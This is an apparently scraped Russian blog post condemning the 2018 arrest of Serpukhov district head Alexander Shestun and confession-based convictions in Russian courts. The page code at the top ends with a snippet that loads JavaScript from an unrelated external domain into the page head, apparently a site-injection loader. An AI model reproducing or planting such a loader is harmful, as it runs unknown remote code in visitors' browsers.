, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Нет в России правосудия, и всюду празднует самовластие

13 Июн

СМИ сообщают о том, что  в Подмосковье задержан глава Серпуховского района Александр Шестун, против него возбуждено уголовное дело о превышении должностных полномочий (статья 286 УК).

Это тот самый глава района, который ещё в 2009 году опубликовал обращение к президенту Дмитрию Медведеву и  утверждал: ««Я, может быть, открою для кого-нибудь тайну, что именно прокуроры зачастую являются первыми взяточниками».

В апреле 2018 года Шестун записал видеообращение, где рассказал, что губернатор Московской области Андрей Воробьев угрожал ему, требуя не согласовывать митинг против мусорного полигона «Лесная» и не участвовать в очередных выборах главы района https://zona.media/chronicle/shestun?utm_referrer=https%3A%2F%2Fzen.yandex.com

Все это происходит на фоне недавних событий, связанных с «Делом Собчака», где Путин  стал одним из героев документального фильма.

Как стало известно, именно Путин помог Собчаку покинуть страну, чтобы экс-мэра не захлестнула клеветническая компания.

А, кто защитит Шестуна?

Ясно, что ни Медведев, ни Путин, ни гарантируемое Конституцией России право на судебную защиту от решений и действия (или бездействия) органов государственной власти и должностных лиц.

Второе десятилетие в стране осуществляется судопроизводство, позволяющее  ежегодно  осуждать сотни тысяч человек, не исследуя собранные по делу доказательства. Это запрещают делать Конституция России и ч. 2 статьи 77 УПК РФ.

Кто и почему решился осуществлять такое  осуждение в стране, где не изжито пыточное судопроизводство, мы, возможно, никогда не узнаем, а вот  подписавший закон на такое судопроизводство, известен — юрист Владимир Путин.

Что породило такое «законотворчество» на практике?

Прежде всего, утрату профессиональных навыков у лиц, уполномоченных на уголовное преследование от имени государства, по  доказыванию самого события преступления и причастности к нему конкретного лица. Невостребованными  оказались предписания по правилам оценки доказательств.

Никто не считается с тем, что каждое доказательство подлежит оценке с точки зрения относимости, допустимости и достоверности.

Достаточным для разрешения уголовного дела стало признание обвиняемым предъявленного ему обвинения. То, что он взял на себя чью-то вину, никто не проверяет.

Никто не борется с карманными» адвокатами, соучаствующими со следователями в получении от обвиняемого признательных показаний, а также произволом следователей, которые по различным надуманным основаниям не допускают в дело адвокатов по соглашению.

Вот и к главе Серпуховского района Александру Шестуну не допускают  адвоката  https://ria.ru/incidents/20180613/1522610325.html

Поэтому адвокатура всё более утрачивает  своё предназначение — выявлять обстоятельства оправдывающие доверителя.

Кроме того,  уголовное судопроизводство  не исполняет своего назначения:  защиту личности от незаконного и необоснованного обвинения, осуждения, ограничения прав и свобод.

Заключая под стражу, судьи не проверяют законность постановления следователя о привлечении в качестве обвиняемого, а если обвиняемый согласился с предъявленным обвинением, судьи не проверяют  подтверждения его виновности совокупностью имеющихся по уголовному делу доказательств.

Поэтому значительная часть осужденных отбывает наказание ни за что, но ещё большая часть — не за то. Об этом публично говорит Генеральный прокурор Юрий Чайка, но гарант Конституции, Владимир Путин, его не слышит.

Несмотря на то, что за последние годы миллионы россиян и их родственников такое беззаконие возмущает, они не решаются о нём даже спросить гаранта Конституции.

На  закрытии «Кинотавра» лицедеи требуют свободы своим собратьям, а юристы отмалчиваются, достоверно зная и понимая, к чему ведёт такое законотворчество и правоприменительная практика.

Прошедшие выборы обрекли нас ещё на годы жизни без власти Конституции, поскольку нет того, кто мог бы обеспечить жизнь страны, работу чиновников по требованиям Основного Закона.

Избранные во власть запамятовали, что именно в 90-е молчаливое большинство стало действовать против самовластия, что учинили в стране чиновники от КПСС,  называвшие себя умом, честью и совестью народа.

У Путина ещё есть время для установления в стране власти Конституции, обеспеченной  правосудием. Как  практикующий 45 лет юрист, могу утверждать, что это важнее всех достижений по Крыму и перевооружению Армии.

Лично у меня есть тревога, что  Путину не удастся уйти в отставку так, как это сделал Ельцин. Всё опять идёт к большой драке.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.